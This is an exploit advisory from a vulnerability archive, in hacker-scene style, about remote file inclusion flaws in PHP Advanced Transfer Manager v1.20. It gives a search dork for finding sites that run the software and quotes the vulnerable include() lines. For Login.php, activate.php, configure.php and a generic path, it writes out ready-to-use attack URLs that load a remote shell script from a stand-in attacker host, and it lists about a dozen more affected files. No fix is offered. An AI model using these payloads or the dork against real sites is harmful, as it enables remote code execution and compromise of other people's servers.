SecurityvulnsSECURITYVULNS:DOC:14214PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
±-------------------------------------------------------------------
+
- PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
±------------------------------------------------------------------
+
- Affected Software .: Software
- Version …: PHP Advanced Transfer Manager v1.20
- Venedor …: http://phpatm.free.fr/
- Class …: Remote File Inclusion
- Risk …: High (Remote File Ex3cut1on)
- Discovered by …: Eddy_BAck0o
- Contact …: l0x3[at]hotmail.com ; www.LEzr.com/vB
±-------------------------------------------------------------------
+
- This weakness in the security of a long Time ;
- but I had not deployed before ;
- and many of the sites included This weakness version …
- you can be sure for that by dork it
- intext:\"Powered by PHP Advanced Transfer Manager v1.20"
- Ex –> victom.com/[local]/anyfile:=)?include_location=http://www.yourev1l.com/r0x.txt?cmd
±-------------------------------------------------------------------
- ./index Directory …
~ [Login.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - include($include_location.'include/conf.php');
- include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Line –> 26 - 625
- Ex –> http://www.victom.com/[path]/Login.php?include_location=http://www.yourev1l.com/r0x.txt?cmd
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ [activate.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- include($include_location.'include/conf.php');
- include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Line –> 26 - 121
- Ex –> http://www.victom.com/[path]/activate.php?include_location=http://www.yourev1l.com/r0x.txt?cmd
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ [configure.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- include($include_location.'include/conf.php');
- include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Line –> 26 - 165
- Ex –> http://www.victom.com/[path]/configure.php?include_location=http://www.yourev1l.com/r0x.txt?cmd
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ confirm.php < -------- 26 - 122
~ fileop.php < -------- 26 - 145
~ getimg.php < -------- 26 - 56
~ ipblocked.php < -------- 25 - 71
~ register.php < -------- 26 - 291
~ showrecent.php < -------- 26 - 275
~ showtophits.php < -------- 26 - 237
~ usrmanag.php < -------- 26 - 381
~ viewer_bottom.php < -------- 27 - 50
~ viewer_content.php < -------- 27 - 49
~ viewer_top.php < -------- 27 - 57
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- gr33tz 4ll ;LEzr.com/vB [ MoHaJaLi ] :P My best;
- and all My the Team ;…
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~